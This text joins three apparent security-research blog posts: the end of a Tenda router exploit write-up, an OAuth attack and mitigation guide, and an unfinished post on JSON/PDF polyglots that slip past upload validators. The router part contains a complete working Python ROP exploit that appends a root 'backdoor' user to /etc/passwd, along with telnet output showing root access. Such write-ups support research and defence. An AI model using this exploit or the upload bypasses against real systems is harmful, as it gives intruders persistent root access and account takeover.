The easiest way to execute a shell command now was to find a gadget chain that would let us invoke the system() function. The calling convention in the ARM architecture is to pass function arguments via registers. The system() function, specifically, accepts the string containing the command to execute as a pointer passed in the r0 register.

Let’s not forget that we also needed to write the command string somewhere in memory. If this were a local binary and not an HTTP server, we could have loaded the address of the /bin/sh string, which is commonly found somewhere in libc, but in this case we needed to specify a custom command in order to set up a backdoor or a reverse shell. The command string itself must terminate with a null byte, therefore we could not just put it in the middle of the padding before the payload. What we could do instead was to put the string after the payload. With no ASLR, the string’s address will be fixed regardless, and the string’s null byte will just be the null byte at the end of the whole payload.

After loading the command string’s address in r0, we needed to “return” to system(). Regarding this, I have a small confession to make. Even though I talked about a return instruction until now, in the ARM32 architecture there is no such thing; a return is simply performed by loading an address into the pc register, which may be done with many different instructions. The simplest example that loads an address from the stack is pop {pc}.

As a recap, what we needed to do is:

write the command string’s address in the stack
load the address in r0
write the system() function address in the stack
load the address in pc

In order to do that, we used ropper to look for gadgets similar to pop {r0}; pop {pc}, but it was not easy to find a suitable one without a null byte in its address. Luckily, we actually found a nice pop {r0, pc} instruction inside libc.so, accomplishing both tasks at once.

With GDB, we got the address of __libc_system (don’t make the mistake of searching for just system, it’s not the right function) and calculated the address where the command string would be written to. We now had everything needed to run a shell command! But which command?
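As a worked example of that calculation, here is how the numbers in this post line up. This is our reading of the GDB output rather than a general rule: it assumes that $sp at the moment of the 0x42424242 crash points to the first word after the overwritten return pointer, and that exactly two words (the value for r0 and the value for pc) sit between that point and the command string.

```python
WORD = 4                   # size of a pointer on ARM32
SP_AT_CRASH = 0xBEFFF8D8   # $sp reported by GDB when pc was 0x42424242


def cmd_string_address(sp_after_return: int, words_before_cmd: int = 2) -> int:
    """Address of the data placed right after the words consumed by pop {r0, pc}."""
    return sp_after_return + words_before_cmd * WORD


print(hex(cmd_string_address(SP_AT_CRASH)))  # 0xbefff8e0
```

The result matches the command string address used in the final exploit.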

We checked which binaries were in the system to look for something that could give us a reverse shell, like a Python or Ruby interpreter, but we could not find anything useful. We could have cross-compiled a custom reverse shell binary, but we decided to go for a much quicker solution: just use the existing Telnet server. We could simply create a backdoor user by adding a line to /etc/passwd, and then log in with that. The command string would be the following:

echo 'backdoor:$1$xyz$ufCh61iwD3FifSl2zK3EI0:0:0:injected:/:/bin/sh' >> /etc/passwd

Note: you can generate a valid hash for the /etc/passwd file with the following command:

openssl passwd -1 -salt xyz hunter2
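For clarity, the injected line follows the usual seven-field /etc/passwd layout. The helper below is only an illustration (the function name and default values are ours) of how the fields map onto the string used in the exploit; a UID and GID of 0 are what make the new user equivalent to root.

```python
def passwd_entry(user: str, pw_hash: str, uid: int = 0, gid: int = 0,
                 gecos: str = "injected", home: str = "/",
                 shell: str = "/bin/sh") -> str:
    """Join the seven colon-separated /etc/passwd fields."""
    return ":".join([user, pw_hash, str(uid), str(gid), gecos, home, shell])


entry = passwd_entry("backdoor", "$1$xyz$ufCh61iwD3FifSl2zK3EI0")
command = f"echo '{entry}' >> /etc/passwd"
print(command)
```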

Finally, here’s what the complete exploit looks like:

#!/usr/bin/env python3
import requests
import random
import sys
import struct

p32 = lambda addr: struct.pack("<I", addr) # Equivalent to pwn.p32

def gen_payload():
    timeto_addr = p32(0xbefff510)      # addr of the time_to string on the stack, i.e. "1"
    system_addr = p32(0x4025c270)      # addr of the system function
    cmd = "echo 'backdoor:$1$xyz$ufCh61iwD3FifSl2zK3EI0:0:0:injected:/:/bin/sh' >> /etc/passwd" # command to run with system()
    cmd_str_addr = p32(0xbefff8e0)     # addr of the cmd string on the stack
    pop_r0_pc = p32(0x4023fb80)        # addr of 'pop {r0, pc}' gadget
    
    payload = b"A"*880                 # stuff we don't care about
    payload += timeto_addr * 17        # addr of the time_to str from the stack, i.e. "1"
                                       # here we are overwriting a bunch of ptrs to strings which are strcpy-ed before we reach ret
                                       # so let's overwrite them with a valid str ptr to ensure it doesn't segfault prematurely
    payload += pop_r0_pc               # ret ptr is here. we jump to 'pop {r0, pc}' gadget to load the cmd string ptr into r0
    payload += cmd_str_addr            # addr of the cmd string from the stack, to be loaded in r0
    payload += system_addr             # addr of system, to be loaded in pc
    payload += cmd.encode()            # the "cmd" string itself, placed at the end so it ends with '\0'
    
    return payload

def exploit(target: str):
    name = "test" + ''.join([str(i) for i in [random.randint(0,9) for _ in range(5)]])
    res = requests.post(
        f"http://{target}/goform/saveParentControlInfo?img/main-logo.png", # Use CVE-2021-44971 Auth Bypass: https://github.com/21Gun5/my_cve/blob/main/tenda/bypass_auth.md
        data={
            "deviceId":"00:00:00:00:00:02",
            "deviceName":name,
            "enable":0,
            "time": gen_payload() + b"-1",
            "url_enable":1,
            "urls":"x.com",
            "day":"1,1,1,1,1,1,1",
            "limit_type":1
            }
    )
    print("Exploit sent")

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} IP:PORT")
        sys.exit()
    target = sys.argv[1]
    try:
        input("Press enter to send exploit")
        exploit(target)
        print("Done! Login to Telnet with backdoor:hunter2")
    except Exception as e:
        print(e)
        print("Connection closed unexpectedly")

The exploit worked flawlessly and added a new “backdoor” user to the system. We could then simply connect with Telnet to have a full root shell.

The final exploit is also available in the GitHub repository.

$ telnet 127.0.0.1 20023
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Tenda login: backdoor
Password:
~ # cat /etc/passwd
root:$1$nalENqL8$jnRFwb1x5S.ygN.3nwTbG1:0:0:root:/:/bin/sh
admin:6HgsSsJIEOc2U:0:0:Administrator:/:/bin/sh
support:Ead09Ca6IhzZY:0:0:Technical Support:/:/bin/sh
user:tGqcT.qjxbEik:0:0:Normal User:/:/bin/sh
nobody:VBcCXSNG7zBAY:0:0:nobody for ftp:/:/bin/sh
backdoor:$1$xyz$ufCh61iwD3FifSl2zK3EI0:0:0:injected:/:/bin/sh

Conclusion

After the activity, we investigated a bit and found out that the specific vulnerability we ended up exploiting was already known as CVE-2020-13393. As far as we can tell, our PoC is the first working exploit for this specific endpoint. Its usefulness is diminished, however, due to the plethora of other exploits already available for this platform.

Nevertheless, this challenge was such a nice learning experience. We got to dive deeper into the ARM architecture and sharpen our exploit development skills. Working together with no reliable Internet also allowed us to share knowledge and approach problems from different perspectives.

If you’ve read this far, nice, well done! Keep an eye on our blog to make sure you don’t miss the next Web and Binary !exploitable episodes.

Common OAuth Vulnerabilities

2025-01-30T00:00:00+01:00

OAuth2’s popularity makes it a prime target for attackers. While it simplifies user login, its complexity can lead to misconfigurations that create security holes. Some of the more intricate vulnerabilities keep reappearing because the protocol’s inner workings are not always well-understood. In an effort to change that, we have decided to write a comprehensive guide on known attacks against OAuth implementations. Additionally, we have created a comprehensive checklist. It should prove useful for testers and developers alike to quickly assess whether their implementation is secure.

Download the OAuth Security Cheat Sheet Now! Doyensec_OAuth_CheatSheet.pdf.

OAuth Introduction

OAuth Terminology

OAuth is a complex protocol with many actors and moving parts. Before we dive into its inner workings, let’s review its terminology:

Resource Owner: Entity that can grant access to a protected resource. Typically, this is the end-user.
Client: Application requesting access to a protected resource on behalf of the Resource Owner.
Resource Server: Server hosting the protected resources. This is the API you want to access.
Authorization Server: Server that authenticates the Resource Owner and issues Access Tokens after getting proper authorization. For example, Auth0.
User Agent: Agent used by the Resource Owner to interact with the Client (for example, a browser or a native application).

References

OAuth 2.0 RFC: https://datatracker.ietf.org/doc/html/rfc6749
OAuth Terminology: #oauth-2-0-terminology

OAuth Common Flows

Attacks against OAuth rely on challenging various assumptions the authorization flows are built upon. It is therefore crucial to understand the flows to efficiently attack and defend OAuth implementations. Here’s the high-level description of the most popular of them.

Implicit Flow

The Implicit Flow was originally designed for native or single-page apps that cannot securely store Client Credentials. However, its use is now discouraged and it is not included in the OAuth 2.1 specification. Despite this, it is still a viable authentication solution within OpenID Connect (OIDC) to retrieve id_tokens.

In this flow, the User Agent is redirected to the Authorization Server. After performing authentication and consent, the Authorization Server directly returns the Access Token, making it accessible to the Resource Owner. This approach exposes the Access Token to the User Agent, which could be compromised through vulnerabilities like XSS or a flawed redirect_uri validation. The implicit flow transports the Access Token as part of the URL if the response_mode is not set to form_post.

Authorization Code Flow

The Authorization Code Flow is one of the most widely used OAuth flows in web applications. Unlike the Implicit Flow, which requests the Access Token directly from the Authorization Server, the Authorization Code Flow introduces an intermediary step. In this process, the User Agent first retrieves an Authorization Code, which the application then exchanges, along with the Client Credentials, for an Access Token. This additional step ensures that only the Client Application has access to the Access Token, preventing the User Agent from ever seeing it.

This flow is suitable exclusively for confidential applications, such as Regular Web Applications, because the application Client Credentials are included in the code exchange request and they must be kept securely stored by the Client Application.

Authorization Code Flow with PKCE

OAuth 2.0 provides a version of the Authorization Code Flow which makes use of a Proof Key for Code Exchange (PKCE). This OAuth flow was originally designed for applications that cannot store a Client Secret, such as native or single-page apps, but it has become the main recommendation in the OAuth 2.1 specification.

Two new parameters are added to the default Authorization Code Flow: a randomly generated value called code_verifier and its transformed version, the code_challenge.

First, the Client creates and records a secret code_verifier and derives a transformed version t(code_verifier), referred to as the code_challenge, which is sent in the Authorization Request along with the transformation method t_m used.
The Client then sends the Authorization Code in the Access Token Request with the code_verifier secret.
Finally, the Authorization Server transforms the received code_verifier and compares the result to the code_challenge, t(code_verifier), that it received in the Authorization Request.

The available transformation methods (t_m) are the following:

plain code_challenge = code_verifier
S256 code_challenge = BASE64URL-ENCODE(SHA256(ASCII(code_verifier)))
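The two transformation methods above can be sketched in a few lines of Python using only the standard library. The function names are ours and this is an illustration of the formulas, not a drop-in replacement for a maintained OAuth library.

```python
import base64
import hashlib
import hmac
import secrets


def make_code_verifier() -> str:
    """Random 43-character verifier made of URL-safe characters."""
    return secrets.token_urlsafe(32)


def code_challenge(verifier: str, method: str = "S256") -> str:
    """Apply the transformation t_m to the verifier."""
    if method == "plain":
        return verifier
    if method == "S256":
        digest = hashlib.sha256(verifier.encode("ascii")).digest()
        # BASE64URL-ENCODE drops the trailing '=' padding
        return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")
    raise ValueError(f"unsupported transformation method: {method}")


def server_side_check(verifier: str, stored_challenge: str, method: str) -> bool:
    """What the Authorization Server does at the Access Token Request."""
    computed = code_challenge(verifier, method)
    return hmac.compare_digest(computed.encode(), stored_challenge.encode())
```

The Client keeps the output of make_code_verifier() secret until the Access Token Request and only sends code_challenge(verifier) in the Authorization Request.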

Note that using the default Authorization Code flow with a custom redirect_uri scheme like example.app:// can allow a malicious app to register itself as a handler for this custom scheme alongside the legitimate OAuth 2.0 app. If this happens, the malicious app can intercept the authorization code and exchange it for an Access Token. For more details, refer to OAuth Redirect Scheme Hijacking.

With PKCE, intercepting the Authorization Response no longer enables the previous attack scenario: attackers would only be able to access the authorization_code, but they would not be able to obtain the code_verifier value required in the Access Token Request.

The diagram below illustrates the Authorization Code flow with PKCE:

References

https://datatracker.ietf.org/doc/html/rfc7636

Client Credentials Flow

The Client Credentials Flow is designed for Machine-to-Machine (M2M) applications, such as daemons or backend services. It is useful when the Client is also the Resource Owner, eliminating the need for User Agent authentication. This flow allows the Client to directly retrieve an Access Token by providing the Client Credentials.

The diagram below illustrates the Client Credentials Flow:

Device Authorization Flow

The Device Authorization Flow is designed for Internet-connected devices that either lack a browser for user-agent-based authorization or are too input-constrained to make text-based authentication practical during the authorization flow.

This flow allows OAuth Clients on devices such as smart TVs, media consoles, digital picture frames or printers to obtain user authorization to access protected resources using a User Agent on a separate device.

In this flow, first the Client application retrieves a User Code and Verification URL from the Authorization Server. Then, it instructs the User Agent to Authenticate and Consent with a different device using the provided User Code and Verification URL.

The following image illustrates the Device Authorization Code Flow:

Resource Owner Password Credentials Flow

This flow requires the Resource Owner to fully trust the Client with their credentials to the Authorization Server. It was designed for use cases where redirect-based flows cannot be used. However, it has been omitted from the OAuth 2.1 draft specification and its use is not recommended.

Instead of redirecting the Resource Owner to the Authorization Server, the user credentials are sent to the Client application, which then forwards them to the Authorization Server.

The following image illustrates the Resource Owner Password Credentials Flow:

Attacks

In this section we’ll present common attacks against OAuth with basic remediation strategies.

CSRF

OAuth CSRF is an attack against OAuth flows, where the browser consuming the Authorization Code is different from the one that initiated the flow. It can be used by an attacker to coerce the victim into consuming the attacker’s Authorization Code, causing the victim to connect with the attacker’s authorization context.

Consider the following diagram:

Depending on the context of the application, the impact can vary from low to high. In either case, it is vital to ensure that the user has control over which authorization context they operate in and cannot be coerced into another one.

Mitigation

The OAuth specification recommends using the state parameter to prevent CSRF attacks.

[state is] an opaque value used by the client to maintain state between the request and callback. The authorization server includes this value when redirecting the user-agent back to the client. The parameter SHOULD be used for preventing cross-site request forgery (CSRF).
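A minimal sketch of that mechanism on the Client side could look as follows. The session object is assumed to be any per-browser dictionary-like store (for example, a server-side session), and the function and key names are hypothetical.

```python
import hmac
import secrets


def new_state(session: dict) -> str:
    """Generate an unguessable state and bind it to the user's session."""
    state = secrets.token_urlsafe(32)
    session["oauth_state"] = state
    return state  # sent as the state parameter of the Authorization Request


def check_state(session: dict, returned_state) -> bool:
    """Validate the state received on the callback; each value is single-use."""
    expected = session.pop("oauth_state", None)
    if expected is None or returned_state is None:
        return False
    return hmac.compare_digest(expected.encode(), returned_state.encode())
```

Because the value lives in the session of the browser that started the flow, a callback forged by an attacker and opened in the victim’s browser carries a state that does not match and is rejected before the Authorization Code is consumed.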

The following scheme illustrates how the state parameter can prevent the attack:

References

Justin Richer, Antonio Sanso, (2017), OAuth 2 In Action

Redirect Attacks

Well-implemented Authorization Servers validate the redirect_uri parameter before redirecting the User Agent back to the Client. The allowlist of redirect_uri values should be configured per-client. Such a design ensures that the User Agent can only be redirected to the Client and that the Authorization Code will only be disclosed to the given Client. Conversely, if the Authorization Server neglects or misimplements this verification, a malicious actor can manipulate a victim into completing a flow that will disclose their Authorization Code to an untrusted party.

In the simplest form, when redirect_uri validation is missing altogether, exploitation can be illustrated with the following flow:

This vulnerability can also emerge when validation is inadequately implemented. The only proper way is validation by comparing the exact redirect_uri including both the origin (scheme, hostname, port) and the path.

Common mistakes include:

validating only origin/domain
allowing subdomains
allowing subpaths
allowing wildcards

If the given origin includes a URL with an open redirect vulnerability, or pages with user-controlled content, they can be abused to steal the code through the Referer header, or through the open redirect.

On the other hand, the following oversights:

partial path matching
misusing regular expressions to match URIs

may lead to various bypasses, where a crafted malicious URL leads to an untrusted origin.
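By contrast, exact matching is trivial to implement. The sketch below assumes a hypothetical per-client registry of fully specified redirect URIs; the client ID and URLs are made up for the example.

```python
# Hypothetical registry: each client lists its complete redirect URIs.
REGISTERED_REDIRECTS = {
    "client-123": {"https://app.example.com/oauth/callback"},
}


def is_allowed_redirect(client_id: str, redirect_uri: str,
                        registry: dict = REGISTERED_REDIRECTS) -> bool:
    """Accept a redirect_uri only if it is byte-for-byte identical to a registered one."""
    return redirect_uri in registry.get(client_id, set())
```

There is no parsing, prefix matching, or regular expression involved, so a different subdomain, an extra path segment, or an appended query string all fail the comparison.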

References

Justin Richer, Antonio Sanso, (2017), OAuth 2 In Action

Mutable Claims Attack

According to the OAuth specification, users are uniquely identified by the sub field. However, there is no standard format for this field. As a result, many different formats are used, depending on the Authorization Server. Some Client applications, in an effort to craft a uniform way of identifying users across multiple Authorization Servers, fall back to user handles or emails. However, this approach may be dangerous, depending on the Authorization Server used. Some Authorization Servers do not guarantee immutability for such user properties. Even worse, in some cases these properties can be arbitrarily changed by the users themselves. In such cases, account takeovers might be possible.

One such case emerges when the “Login with Microsoft” feature is implemented to use the email field to identify users. In such cases, an attacker might create their own AD organization (doyensectestorg in this case) on Azure, which can then be used to perform “Login with Microsoft”. While the Object ID field, which is placed in sub, is immutable for a given user and cannot be spoofed, the email field is purely user-controlled and does not require any verification.

In the screenshot above, there’s an example user created, that could be used to take over an account victim@gmail.com in the Client, which uses the email field for user identification.
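One way to avoid this class of issues, sketched below under the assumption that the Client receives a dictionary of claims containing iss and sub, is to key local accounts on the issuer and subject pair instead of on mutable properties. The claim values are invented for the example.

```python
def account_key(claims: dict) -> tuple:
    """Identify a user by issuer and subject, never by email or handle."""
    return (claims["iss"], claims["sub"])


# Hypothetical claims: same email, different identities.
victim = {"iss": "https://idp-one.example", "sub": "1111",
          "email": "victim@gmail.com"}
attacker = {"iss": "https://idp-two.example", "sub": "attacker-object-id",
            "email": "victim@gmail.com"}

print(account_key(victim) == account_key(attacker))  # False
```

With this lookup, the attacker-controlled email no longer maps to the victim’s account.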

Client Confusion Attack

When applications implement OAuth Implicit Flow for authentication they should verify that the final provided token was generated for that specific Client ID. If this check is not performed, it would be possible for an attacker to use an Access Token that had been generated for a different Client ID.

Imagine the attacker creates a public website which allows users to log in with Google’s OAuth Implicit flow. Assuming thousands of people connect to the hosted website, the attacker would then have access to their Google OAuth Access Tokens generated for the attacker’s website.

If any of these users already had an account on a vulnerable website that does not verify the Access Token, the attacker would be able to provide the victim’s Access Token generated for a different Client ID and will be able to take over the account of the victim.

A secure OAuth Implicit Flow implemented for authentication would be as follows:

If steps 8 to 10 are not performed and the token’s Client ID is not validated, it would be possible to perform the following attack:

Remediation

It is worth noting that even if the Client uses a more secure flow (e.g. Explicit Flow), it might accept Access Tokens, effectively allowing a downgrade to the Implicit Flow. Additionally, if the application uses the Access Tokens as session cookies or authorization headers, it might be vulnerable. In practice, ensuring that the Access Tokens are never accepted from user-controlled parameters breaks the exploitation chain early. On top of that, we recommend performing token verification as described above in steps 8 to 10.
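The Client ID check itself can be as small as the sketch below. It assumes the Client has already obtained the token’s metadata from the Authorization Server (for instance through a token introspection or token info endpoint) as a dictionary that exposes the intended audience in an aud field; the field name and the function name are assumptions that vary between providers.

```python
def token_is_for_client(token_info: dict, expected_client_id: str) -> bool:
    """Reject Access Tokens that were issued to a different Client ID."""
    aud = token_info.get("aud")
    audiences = aud if isinstance(aud, list) else [aud]
    return expected_client_id in audiences
```

A token harvested on the attacker’s website would carry the attacker’s Client ID as audience and would be rejected by this check.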

References

https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts

Scope Upgrade Attack

With the Authorization Code Grant type, the user’s data is requested and sent via secure server-to-server communication.

If the Authorization Server accepts and implicitly trusts a scope parameter sent in the Access Token Request (Note this parameter is not specified in the RFC for the Access Token Request in the Authorization Code Flow), a malicious application could try to upgrade the scope of Authorization Codes retrieved from user callbacks by sending a higher privileged scope in the Access Token Request.

Once the Access Token is generated, the Resource Server must verify the Access Token for every request. This verification depends on the Access Token format. The commonly used ones are the following:

JWT Access Token: With this kind of access token, the Resource Server only needs to check the JWT signature and then retrieve the data included in the JWT (client_id, scope, etc.).
Random String Access Token: Since this kind of token does not carry any additional information, the Resource Server needs to retrieve the token information from the Authorization Server.

Mitigation

Following the RFC guidelines, the scope parameter should not be sent in the Access Token Request in the Authorization Code flow, although it can be specified in other flows such as the Resource Owner Password Credentials Grant.

The Authorization Server should either ignore the scope parameter or verify it matches the previous scope provided in the Authorization Request.
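The second option, verifying that a scope sent with the Access Token Request matches what was granted, could look like the sketch below. It assumes scopes are space-delimited strings compared as unordered sets; the function name and the error string are hypothetical choices for illustration, not part of any specific Authorization Server.

```javascript
// Hypothetical Authorization Server helper for the Access Token Request.
// `grantedScope` is the scope approved in the Authorization Request;
// `requestedScope` is an optional scope parameter sent with the token request.
function resolveTokenScope(grantedScope, requestedScope) {
  const granted = grantedScope.split(' ').filter(Boolean);
  if (requestedScope === undefined || requestedScope === null) {
    return granted; // nothing to compare: issue exactly what was granted
  }
  const grantedSet = new Set(granted);
  const requestedSet = new Set(requestedScope.split(' ').filter(Boolean));
  // The order of scope values does not matter, so compare them as sets
  const matches = grantedSet.size === requestedSet.size &&
    [...requestedSet].every((scope) => grantedSet.has(scope));
  if (!matches) {
    throw new Error('invalid_scope'); // refuse any attempt to change the scope
  }
  return granted;
}
```

Whatever the client sends, the issued token is built from the granted scope only, so a request carrying an extra value such as `admin` fails instead of being silently upgraded.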

References

https://datatracker.ietf.org/doc/html/rfc6749#section-3.3

Redirect Scheme Hijacking

When OAuth is needed on mobile, the mobile application takes the role of the OAuth User Agent. To receive the redirect with the Authorization Code, developers often rely on custom schemes. However, multiple applications can register a given scheme on a given device. This breaks OAuth’s assumption that the Client is the only one to control the configured redirect_uri and may lead to Authorization Code takeover if a malicious app is installed on the victim’s device.

Android Intent URIs have the following structure:

<scheme>://<host>:<port>[<path>|<pathPrefix>|<pathPattern>|<pathAdvancedPattern>|<pathSuffix>]

So for instance the following URI com.example.app://oauth depicts an Intent with scheme=com.example.app and host=oauth. In order to receive these Intents an Android application would need to export an Activity similar to the following:

    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:host="oauth" android:scheme="com.example.app"/>
    </intent-filter>

The Android system is pretty lenient when it comes to defining Intent Filters. The fewer details a filter specifies, the wider the net and the more URIs it catches. For instance, if only the scheme is provided, all Intents for this scheme will be caught, regardless of their host, path, etc.
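The widening effect can be illustrated with a deliberately simplified model. The sketch below is not Android's real resolution algorithm: it only looks at scheme and host, and the function names and filter shape are hypothetical.

```javascript
// Simplified model of Intent Filter matching (scheme and host only).
// This is NOT Android's real algorithm; it only illustrates that
// omitting a detail from the filter widens what the filter catches.
function parseUri(uri) {
  const match = /^([A-Za-z][A-Za-z0-9+.-]*):\/\/([^\/:?#]*)/.exec(uri);
  return match ? { scheme: match[1], host: match[2] } : null;
}

function filterMatches(filter, uri) {
  const parsed = parseUri(uri);
  if (!parsed) return false;
  if (filter.scheme !== parsed.scheme) return false;
  // A filter without a host accepts every host for its scheme
  return filter.host === undefined || filter.host === parsed.host;
}
```

In this model, `{ scheme: 'com.example.app' }` matches both `com.example.app://oauth` and `com.example.app://anything`, while adding `host: 'oauth'` narrows the filter to the first URI only.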

If more than one application can catch a given Intent, the system will let the user decide which one to use, which means a redirect takeover would require user interaction. However, with the above knowledge it is possible to craft bypasses, depending on how the legitimate application’s filter has been created. Paradoxically, the more specific the original developers were, the easier it is to craft a bypass and take over the redirect without user interaction. Ostorlab has created the following flowchart to quickly assess whether it is possible:

Recommendation

For situations where the Explicit Authorization Code Flow is not viable, because the Client cannot be trusted to securely store the Client Secret, Authorization Code Flow with Proof Key for Code Exchange (PKCE) has been created. We recommend utilizing this flow for authorizing mobile applications.

Additionally, to restore the trust relation between the Authorization Server and redirect_uri target, it is recommended to use Android’s Verifiable Links and iOS’s Associated Domains mechanisms.

In short, Android introduced the autoVerify property for Intent Filters. Developers can create an Intent Filter similar to the following:

<intent-filter android:autoVerify="true">
  <action android:name="android.intent.action.VIEW" />
  <category android:name="android.intent.category.DEFAULT" />
  <category android:name="android.intent.category.BROWSABLE" />
  <data android:scheme="http" />
  <data android:scheme="https" />
  <data android:host="www.example.com" />
</intent-filter>

When the Intent Filter is defined this way, the Android system verifies whether the defined host is actually owned by the creator of the app. In detail, the host needs to publish a /.well-known/assetlinks.json file on the associated domain, listing the given APK, for the app to be allowed to handle the given links:

[{
  "relation": ["delegate_permission/common.handle_all_urls"],
  "target": {
    "namespace": "android_app",
    "package_name": "com.example",
    "sha256_cert_fingerprints":
    ["14:6D:E9:83:C5:73:06:50:D8:EE:B9:95:2F:34:FC:64:16:A0:83:42:E6:1D:BE:A8:8A:04:96:B2:3F:CF:44:E5"]
  }
}]

Thanks to this design, rogue applications cannot register their own Intent Filter for the already claimed host, although this would only work if the handled scheme is not custom. For instance, if the application handles the com.example.app:// scheme there is no way to give additional priority and the user will have to choose between the apps that implement a handler for that specific scheme.
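The idea behind the assetlinks.json check can be sketched as a lookup in the published document. The helper below is hypothetical and only mirrors the structure of the JSON shown above; the real verification is performed by the Android system and involves more than this comparison.

```javascript
// Hypothetical check mirroring the idea behind assetlinks.json verification:
// does the published document delegate URL handling to this package and certificate?
function isAppAuthorized(assetLinks, packageName, certFingerprint) {
  return assetLinks.some((entry) =>
    Array.isArray(entry.relation) &&
    entry.relation.includes('delegate_permission/common.handle_all_urls') &&
    Boolean(entry.target) &&
    entry.target.namespace === 'android_app' &&
    entry.target.package_name === packageName &&
    Array.isArray(entry.target.sha256_cert_fingerprints) &&
    entry.target.sha256_cert_fingerprints.includes(certFingerprint));
}
```

A rogue application signed with a different certificate, or published under a different package name, is not listed in the domain owner's file and therefore fails the lookup.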

References

Summary

This article provides a comprehensive list of attacks and defenses for the OAuth protocol. Along with the post itself, we are releasing a comprehensive cheat-sheet for developers and testers.

Download the OAuth Security Cheat Sheet: Doyensec_OAuth_CheatSheet.pdf.

As this field is subject to frequent new research and development, we do not claim full knowledge of all intricacies. If you have suggestions on how to improve this summary, feel free to contact the authors. We would be glad to update this blog post so that it can be considered as a comprehensive resource for anyone interested in the topic.

Bypassing File Upload Restrictions To Exploit Client-Side Path Traversal

2025-01-09T00:00:00+01:00

In my previous blog post, I demonstrated how a JSON file could be used as a gadget for Client-Side Path Traversal (CSPT) to perform Cross-Site Request Forgery (CSRF). That example was straightforward because no file upload restriction was enforced. However, real-world applications often impose restrictions on file uploads to ensure security.

In this post, we’ll explore how to bypass some of these mechanisms to achieve the same goal. We’ll cover common file validation methods and how they can be subverted.

Constraint

In most scenarios, the gadget file will be parsed in the front-end using JSON.parse. This means that our file must be a valid input for JSON.parse. According to the V8 implementation, a valid JSON input is:

a string
a number
true
false
null
an array
an object

The parser skips leading WHITESPACE characters such as:

‘ ’
‘\t’
‘\r’
‘\n’

Also, control characters and double quotes inside a JSON object (key or value) will break the JSON structure and must be escaped.

Our gadget file must follow these restrictions to be parsed as JSON.
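These constraints are easy to check while crafting a gadget. The helper below is a small sketch (the function name is ours) that simply reports whether JSON.parse accepts a candidate file.

```javascript
// Returns true when `text` is accepted by JSON.parse, false otherwise
function isParsableJson(text) {
  try {
    JSON.parse(text);
    return true;
  } catch (error) {
    return false;
  }
}
```

For instance, `isParsableJson(' \t\r\n{"_id":"x"}')` is accepted because leading whitespace is skipped, whereas a string value containing a raw line feed, or a file starting with bytes such as `%PDF`, is rejected.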

Different applications validate files using libraries or tools designed to detect the file’s MIME type, file structure or magic bytes. By creatively crafting files that meet these conditions, we can fool these validations and bypass the restrictions.

Let’s explore how various file upload mechanisms can be bypassed to maintain valid JSON payloads for CSPT while satisfying file format requirements, such as PDFs or images.

Bypassing PDF Checks To Upload a JSON File

A basic check in many upload mechanisms involves verifying the file’s MIME type. This is often done using the Content-Type header or by inspecting the file itself. However, these checks can often be bypassed by manipulating the file’s structure or headers.

Bypassing mmmagic Validation

The mmmagic library is commonly used in Node.js applications to detect file types based on the Magic database. A PDF file can be verified with the following code:

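// mmmagic exposes the Magic class and the MAGIC_* flags
const mmm = require('mmmagic');
const Magic = mmm.Magic;

async function checkMMMagic(binaryFile) {
    const magic = new Magic(mmm.MAGIC_MIME_TYPE);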

    const detectAsync = (binaryFile) => {
        return new Promise((resolve, reject) => {
            magic.detect.call(magic, binaryFile, (error, result) => {
                if (error) {
                    reject(error);
                } else {
                    resolve(result);
                }
            });
        });
    };

    const result = await detectAsync(binaryFile);

    const isValid = (result === 'application/pdf')
    if (!isValid) {
        throw new Error('mmmagic: File is not a PDF : ' + result);
    }
}

Technique:

The library checks for the %PDF magic bytes. It uses the Magic detection rules defined here. However, according to the PDF specification, this magic number doesn’t need to be at the very beginning of the file.

We can wrap a PDF header within the first 1024 bytes of a JSON object. It will be a valid JSON file considered as a PDF by the library. This allows us to fool the library into accepting the upload as a valid PDF while still allowing it to be parsed as JSON by the browser. Here’s an example:

{ "id" : "../CSPT_PAYLOAD", "%PDF": "1.4" }

As long as the %PDF header appears within the first 1024 bytes, the mmmagic library will accept this file as a PDF, but it can still be parsed as JSON on the client side.
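When preparing such a file, it helps to check both properties at once. The sketch below uses a simplified stand-in for the detection behavior described above (a `%PDF` marker within the first 1024 bytes); it is a model for experimentation with hypothetical function names, not mmmagic's actual rule set.

```javascript
// Simplified stand-in for the behavior described above: treat the data as a PDF
// when "%PDF" appears within the first 1024 bytes. This is a model for
// experimentation, not mmmagic's actual rule set.
function hasPdfMarkerEarly(buffer) {
  const index = buffer.indexOf('%PDF');
  return index !== -1 && index + 4 <= 1024;
}

// A candidate must be valid JSON and also carry the early PDF marker
function isPolyglotCandidate(text) {
  try {
    JSON.parse(text);
  } catch {
    return false;
  }
  return hasPdfMarkerEarly(Buffer.from(text, 'utf8'));
}
```

The example file above satisfies both conditions in this model. The result should still be confirmed against the real library, since the model ignores every other rule in the Magic database.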

Bypassing pdflib Validation

The pdflib library requires more than just the %PDF header. It can be used to validate the overall PDF structure.

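// Assumes the pdf-lib package, which provides PDFDocument.load
const { PDFDocument } = require('pdf-lib');

async function checkPdfLib(binaryFile) {
    let pdfDoc = null;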
    try {
        pdfDoc = await PDFDocument.load(binaryFile);
    } catch (error) {
        throw new Error('pdflib: Not a valid PDF')
    }

    if (pdfDoc.getPageCount() == 0) {
        throw new Error('pdflib: PDF doesn\'t have a page');
    }
}

Technique:

To bypass this, we can create a valid PDF (for pdflib) that still conforms to the JSON structure required for CSPT. The trick is to replace %0A (line feed) characters between PDF object definitions with space %20. This allows the file to be recognized as a valid PDF for pdflib but still be interpretable as JSON. The xref table doesn’t need to be fixed because our goal is not to display the PDF, but to pass the upload validation.

Here’s an example:

